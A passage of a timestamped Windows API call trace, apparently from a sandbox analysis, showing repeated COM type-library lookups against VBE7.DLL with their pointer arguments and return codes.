pbstrName=0x144b00, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x144b00, pwOrdinal=0x500000000) returned 0x0 [0069.521] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xaf0b528, ppTLib=0x143bf0, pIndex=0x0 | out: ppTLib=0x143bf0*=0x665ba50, pIndex=0x0) returned 0x0 [0069.521] ITypeLib:RemoteGetLibAttr (in: This=0x665ba50, ppTLibAttr=0x143c00, pDummy=0x0 | out: ppTLibAttr=0x143c00, pDummy=0x0) returned 0x0 [0069.521] ITypeLib:LocalReleaseTLibAttr (This=0x665ba50) returned 0x0 [0069.521] IUnknown:Release (This=0x665ba50) returned 0xd [0069.521] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612737, invkind=1, refPtrFlags=0x143bf0, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0*=0x5380) returned 0x0 [0069.521] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee3b5d830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0069.521] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612737, invkind=1, refPtrFlags=0x0, pBstrDllName=0x143bf0, pbstrName=0x0, pwOrdinal=0x143c10 | out: pBstrDllName=0x143bf0*=0x0, pbstrName=0x0, pwOrdinal=0x143c10*=0x3e80) returned 0x0 [0069.521] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612737, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x143bf0, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x143bf0, pwOrdinal=0x500000000) returned 0x0 [0069.521] IMalloc:Realloc (This=0x7fefec05380, pv=0xaffde90, cb=0x1410) returned 0xaffde90 [0069.521] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xaf0b528, ppTLib=0x143df0, pIndex=0x0 | out: ppTLib=0x143df0*=0x665ba50, pIndex=0x0) returned 0x0 [0069.521] ITypeLib:RemoteGetLibAttr (in: This=0x665ba50, ppTLibAttr=0x143e00, pDummy=0x0 | out: ppTLibAttr=0x143e00, pDummy=0x0) returned 0x0 [0069.521] ITypeLib:LocalReleaseTLibAttr (This=0x665ba50) returned 0x0 [0069.521] IUnknown:Release (This=0x665ba50) returned 0xd [0069.521] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x143df0, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0*=0x5380) returned 0x0 [0069.521] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee3b5d830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0069.521] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x0, pBstrDllName=0x143df0, pbstrName=0x0, pwOrdinal=0x143e10 | out: pBstrDllName=0x143df0*=0x0, pbstrName=0x0, pwOrdinal=0x143e10*=0x4080) returned 0x0 [0069.521] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x143df0, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x143df0, pwOrdinal=0x500000000) returned 0x0 [0069.521] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xaf0b528, ppTLib=0x1442b0, pIndex=0x0 | out: ppTLib=0x1442b0*=0x665ba50, pIndex=0x0) returned 0x0 [0069.521] ITypeLib:RemoteGetLibAttr (in: This=0x665ba50, ppTLibAttr=0x1442c0, pDummy=0x0 | out: ppTLibAttr=0x1442c0, pDummy=0x0) returned 0x0 [0069.521] ITypeLib:LocalReleaseTLibAttr (This=0x665ba50) returned 0x0 [0069.521] IUnknown:Release (This=0x665ba50) returned 0xd [0069.521] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x1442b0, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0*=0x5380) returned 0x0 [0069.521] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee3b5d830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0069.522] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x0, pBstrDllName=0x1442b0, pbstrName=0x0, pwOrdinal=0x1442d0 | out: pBstrDllName=0x1442b0*=0x0, pbstrName=0x0, pwOrdinal=0x1442d0*=0x4540) returned 0x0 [0069.522] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x1442b0, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x1442b0, pwOrdinal=0x500000000) returned 0x0 [0069.522] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xaf0b6e0, ppTLib=0x144710, pIndex=0x0 | out: ppTLib=0x144710*=0x665ba50, pIndex=0x0) returned 0x0 [0069.522] ITypeLib:RemoteGetLibAttr (in: This=0x665ba50, ppTLibAttr=0x144720, pDummy=0x0 | out: ppTLibAttr=0x144720, pDummy=0x0) returned 0x0 [0069.522] ITypeLib:LocalReleaseTLibAttr (This=0x665ba50) returned 0x0 [0069.522] IUnknown:Release (This=0x665ba50) returned 0xd [0069.522] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612745, invkind=1, refPtrFlags=0x144710, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0*=0x5380) returned 0x0 [0069.522] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee3b5d830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0069.522] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612745, invkind=1, refPtrFlags=0x0, pBstrDllName=0x144710, pbstrName=0x0, pwOrdinal=0x144730 | out: pBstrDllName=0x144710*=0x0, pbstrName=0x0, pwOrdinal=0x144730*=0x49a0) returned 0x0 [0069.522] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612745, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x144710, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x144710, pwOrdinal=0x500000000) returned 0x0 [0069.522] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xaf0b6e0, ppTLib=0x144b00, pIndex=0x0 | out: ppTLib=0x144b00*=0x665ba50, pIndex=0x0) returned 0x0 [0069.522] ITypeLib:RemoteGetLibAttr (in: This=0x665ba50, ppTLibAttr=0x144b10, pDummy=0x0 | out: ppTLibAttr=0x144b10, pDummy=0x0) returned 0x0 [0069.522] ITypeLib:LocalReleaseTLibAttr (This=0x665ba50) returned 0x0 [0069.522] IUnknown:Release (This=0x665ba50) returned 0xd [0069.522] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612744, invkind=1, refPtrFlags=0x144b00, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0*=0x5380) returned 0x0 [0069.522] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee3b5d830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0069.522] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612744, invkind=1, refPtrFlags=0x0, pBstrDllName=0x144b00, pbstrName=0x0, pwOrdinal=0x144b20 | out: pBstrDllName=0x144b00*=0x0, pbstrName=0x0, pwOrdinal=0x144b20*=0x4d90) returned 0x0 [0069.522] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612744, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x144b00, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x144b00, pwOrdinal=0x500000000) returned 0x0 [0069.522] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xaf0b528, ppTLib=0x143bf0, pIndex=0x0 | out: ppTLib=0x143bf0*=0x665ba50, pIndex=0x0) returned 0x0 [0069.522] ITypeLib:RemoteGetLibAttr (in: This=0x665ba50, ppTLibAttr=0x143c00, pDummy=0x0 | out: ppTLibAttr=0x143c00, pDummy=0x0) returned 0x0 [0069.522] ITypeLib:LocalReleaseTLibAttr (This=0x665ba50) returned 0x0 [0069.522] IUnknown:Release (This=0x665ba50) returned 0xd [0069.522] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612737, invkind=1, refPtrFlags=0x143bf0, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0*=0x5380) returned 0x0 [0069.523] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee3b5d830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0069.523] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612737, invkind=1, refPtrFlags=0x0, pBstrDllName=0x143bf0, pbstrName=0x0, pwOrdinal=0x143c10 | out: pBstrDllName=0x143bf0*=0x0, pbstrName=0x0, pwOrdinal=0x143c10*=0x3e80) returned 0x0 [0069.523] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612737, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x143bf0, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x143bf0, pwOrdinal=0x500000000) returned 0x0 [0069.523] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xaf0b528, ppTLib=0x143df0, pIndex=0x0 | out: ppTLib=0x143df0*=0x665ba50, pIndex=0x0) returned 0x0 [0069.523] ITypeLib:RemoteGetLibAttr (in: This=0x665ba50, ppTLibAttr=0x143e00, pDummy=0x0 | out: ppTLibAttr=0x143e00, pDummy=0x0) returned 0x0 [0069.523] ITypeLib:LocalReleaseTLibAttr (This=0x665ba50) returned 0x0 [0069.523] IUnknown:Release (This=0x665ba50) returned 0xd [0069.523] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x143df0, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0*=0x5380) returned 0x0 [0069.523] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee3b5d830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0069.523] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x0, pBstrDllName=0x143df0, pbstrName=0x0, pwOrdinal=0x143e10 | out: pBstrDllName=0x143df0*=0x0, pbstrName=0x0, pwOrdinal=0x143e10*=0x4080) returned 0x0 [0069.523] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x143df0, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x143df0, pwOrdinal=0x500000000) returned 0x0 [0069.523] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xaf0b528, ppTLib=0x1442b0, pIndex=0x0 | out: ppTLib=0x1442b0*=0x665ba50, pIndex=0x0) returned 0x0 [0069.523] ITypeLib:RemoteGetLibAttr (in: This=0x665ba50, ppTLibAttr=0x1442c0, pDummy=0x0 | out: ppTLibAttr=0x1442c0, pDummy=0x0) returned 0x0 [0069.523] ITypeLib:LocalReleaseTLibAttr (This=0x665ba50) returned 0x0 [0069.523] IUnknown:Release (This=0x665ba50) returned 0xd [0069.523] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x1442b0, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0*=0x5380) returned 0x0 [0069.523] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee3b5d830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0069.523] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x0, pBstrDllName=0x1442b0, pbstrName=0x0, pwOrdinal=0x1442d0 | out: pBstrDllName=0x1442b0*=0x0, pbstrName=0x0, pwOrdinal=0x1442d0*=0x4540) returned 0x0 [0069.523] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x1442b0, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x1442b0, pwOrdinal=0x500000000) returned 0x0 [0069.523] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xaf0b6e0, ppTLib=0x144710, pIndex=0x0 | out: ppTLib=0x144710*=0x665ba50, pIndex=0x0) returned 0x0 [0069.523] ITypeLib:RemoteGetLibAttr (in: This=0x665ba50, ppTLibAttr=0x144720, pDummy=0x0 | out: ppTLibAttr=0x144720, pDummy=0x0) returned 0x0 [0069.523] ITypeLib:LocalReleaseTLibAttr (This=0x665ba50) returned 0x0 [0069.523] IUnknown:Release (This=0x665ba50) returned 0xd [0069.524] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612745, invkind=1, refPtrFlags=0x144710, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0*=0x5380) returned 0x0 [0069.524] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee3b5d830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0069.524] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612745, invkind=1, refPtrFlags=0x0, pBstrDllName=0x144710, pbstrName=0x0, pwOrdinal=0x144730 | out: pBstrDllName=0x144710*=0x0, pbstrName=0x0, pwOrdinal=0x144730*=0x49a0) returned 0x0 [0069.524] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612745, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x144710, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x144710, pwOrdinal=0x500000000) returned 0x0 [0069.524] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xaf0b6e0, ppTLib=0x144b00, pIndex=0x0 | out: ppTLib=0x144b00*=0x665ba50, pIndex=0x0) returned 0x0 [0069.524] ITypeLib:RemoteGetLibAttr (in: This=0x665ba50, ppTLibAttr=0x144b10, pDummy=0x0 | out: ppTLibAttr=0x144b10, pDummy=0x0) returned 0x0 [0069.524] ITypeLib:LocalReleaseTLibAttr (This=0x665ba50) returned 0x0 [0069.524] IUnknown:Release (This=0x665ba50) returned 0xd [0069.524] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612744, invkind=1, refPtrFlags=0x144b00, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0*=0x5380) returned 0x0 [0069.524] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee3b5d830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0069.524] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612744, invkind=1, refPtrFlags=0x0, pBstrDllName=0x144b00, pbstrName=0x0, pwOrdinal=0x144b20 | out: pBstrDllName=0x144b00*=0x0, pbstrName=0x0, pwOrdinal=0x144b20*=0x4d90) returned 0x0 [0069.524] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612744, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x144b00, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x144b00, pwOrdinal=0x500000000) returned 0x0 [0069.524] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xaf0b528, ppTLib=0x143bf0, pIndex=0x0 | out: ppTLib=0x143bf0*=0x665ba50, pIndex=0x0) returned 0x0 [0069.524] ITypeLib:RemoteGetLibAttr (in: This=0x665ba50, ppTLibAttr=0x143c00, pDummy=0x0 | out: ppTLibAttr=0x143c00, pDummy=0x0) returned 0x0 [0069.524] ITypeLib:LocalReleaseTLibAttr (This=0x665ba50) returned 0x0 [0069.524] IUnknown:Release (This=0x665ba50) returned 0xd [0069.524] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612737, invkind=1, refPtrFlags=0x143bf0, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0*=0x5380) returned 0x0 [0069.524] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee3b5d830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0069.524] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612737, invkind=1, refPtrFlags=0x0, pBstrDllName=0x143bf0, pbstrName=0x0, pwOrdinal=0x143c10 | out: pBstrDllName=0x143bf0*=0x0, pbstrName=0x0, pwOrdinal=0x143c10*=0x3e80) returned 0x0 [0069.524] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612737, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x143bf0, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x143bf0, pwOrdinal=0x500000000) returned 0x0 [0069.524] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xaf0b528, ppTLib=0x143df0, pIndex=0x0 | out: ppTLib=0x143df0*=0x665ba50, pIndex=0x0) returned 0x0 [0069.524] ITypeLib:RemoteGetLibAttr (in: This=0x665ba50, ppTLibAttr=0x143e00, pDummy=0x0 | out: ppTLibAttr=0x143e00, pDummy=0x0) returned 0x0 [0069.525] ITypeLib:LocalReleaseTLibAttr (This=0x665ba50) returned 0x0 [0069.525] IUnknown:Release (This=0x665ba50) returned 0xd [0069.525] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x143df0, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0*=0x5380) returned 0x0 [0069.525] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee3b5d830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0069.525] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x0, pBstrDllName=0x143df0, pbstrName=0x0, pwOrdinal=0x143e10 | out: pBstrDllName=0x143df0*=0x0, pbstrName=0x0, pwOrdinal=0x143e10*=0x4080) returned 0x0 [0069.525] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x143df0, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x143df0, pwOrdinal=0x500000000) returned 0x0 [0069.525] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xaf0b528, ppTLib=0x1442b0, pIndex=0x0 | out: ppTLib=0x1442b0*=0x665ba50, pIndex=0x0) returned 0x0 [0069.525] ITypeLib:RemoteGetLibAttr (in: This=0x665ba50, ppTLibAttr=0x1442c0, pDummy=0x0 | out: ppTLibAttr=0x1442c0, pDummy=0x0) returned 0x0 [0069.525] ITypeLib:LocalReleaseTLibAttr (This=0x665ba50) returned 0x0 [0069.525] IUnknown:Release (This=0x665ba50) returned 0xd [0069.525] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x1442b0, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0*=0x5380) returned 0x0 [0069.525] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee3b5d830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0069.525] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x0, pBstrDllName=0x1442b0, pbstrName=0x0, pwOrdinal=0x1442d0 | out: pBstrDllName=0x1442b0*=0x0, pbstrName=0x0, pwOrdinal=0x1442d0*=0x4540) returned 0x0 [0069.525] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x1442b0, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x1442b0, pwOrdinal=0x500000000) returned 0x0 [0069.525] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xaf0b6e0, ppTLib=0x144710, pIndex=0x0 | out: ppTLib=0x144710*=0x665ba50, pIndex=0x0) returned 0x0 [0069.525] ITypeLib:RemoteGetLibAttr (in: This=0x665ba50, ppTLibAttr=0x144720, pDummy=0x0 | out: ppTLibAttr=0x144720, pDummy=0x0) returned 0x0 [0069.525] ITypeLib:LocalReleaseTLibAttr (This=0x665ba50) returned 0x0 [0069.525] IUnknown:Release (This=0x665ba50) returned 0xd [0069.525] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612745, invkind=1, refPtrFlags=0x144710, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0*=0x5380) returned 0x0 [0069.525] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee3b5d830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0069.525] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612745, invkind=1, refPtrFlags=0x0, pBstrDllName=0x144710, pbstrName=0x0, pwOrdinal=0x144730 | out: pBstrDllName=0x144710*=0x0, pbstrName=0x0, pwOrdinal=0x144730*=0x49a0) returned 0x0 [0069.525] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612745, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x144710, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x144710, pwOrdinal=0x500000000) returned 0x0 [0069.525] IMalloc:Realloc (This=0x7fefec05380, pv=0xaffde90, cb=0x1810) returned 0xaffde90 [0069.526] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xaf0b6e0, ppTLib=0x144b00, pIndex=0x0 | out: ppTLib=0x144b00*=0x665ba50, pIndex=0x0) returned 0x0 [0069.526] ITypeLib:RemoteGetLibAttr (in: This=0x665ba50, ppTLibAttr=0x144b10, pDummy=0x0 | out: ppTLibAttr=0x144b10, pDummy=0x0) returned 0x0 [0069.526] ITypeLib:LocalReleaseTLibAttr (This=0x665ba50) returned 0x0 [0069.526] IUnknown:Release (This=0x665ba50) returned 0xd [0069.526] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612744, invkind=1, refPtrFlags=0x144b00, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0*=0x5380) returned 0x0 [0069.526] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee3b5d830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0069.526] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612744, invkind=1, refPtrFlags=0x0, pBstrDllName=0x144b00, pbstrName=0x0, pwOrdinal=0x144b20 | out: pBstrDllName=0x144b00*=0x0, pbstrName=0x0, pwOrdinal=0x144b20*=0x4d90) returned 0x0 [0069.526] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612744, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x144b00, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x144b00, pwOrdinal=0x500000000) returned 0x0 [0069.526] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xaf0b528, ppTLib=0x143bf0, pIndex=0x0 | out: ppTLib=0x143bf0*=0x665ba50, pIndex=0x0) returned 0x0 [0069.526] ITypeLib:RemoteGetLibAttr (in: This=0x665ba50, ppTLibAttr=0x143c00, pDummy=0x0 | out: ppTLibAttr=0x143c00, pDummy=0x0) returned 0x0 [0069.526] ITypeLib:LocalReleaseTLibAttr (This=0x665ba50) returned 0x0 [0069.526] IUnknown:Release (This=0x665ba50) returned 0xd [0069.526] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612737, invkind=1, refPtrFlags=0x143bf0, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0*=0x5380) returned 0x0 [0069.526] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee3b5d830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0069.526] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612737, invkind=1, refPtrFlags=0x0, pBstrDllName=0x143bf0, pbstrName=0x0, pwOrdinal=0x143c10 | out: pBstrDllName=0x143bf0*=0x0, pbstrName=0x0, pwOrdinal=0x143c10*=0x3e80) returned 0x0 [0069.526] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612737, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x143bf0, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x143bf0, pwOrdinal=0x500000000) returned 0x0 [0069.526] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xaf0b528, ppTLib=0x143df0, pIndex=0x0 | out: ppTLib=0x143df0*=0x665ba50, pIndex=0x0) returned 0x0 [0069.526] ITypeLib:RemoteGetLibAttr (in: This=0x665ba50, ppTLibAttr=0x143e00, pDummy=0x0 | out: ppTLibAttr=0x143e00, pDummy=0x0) returned 0x0 [0069.526] 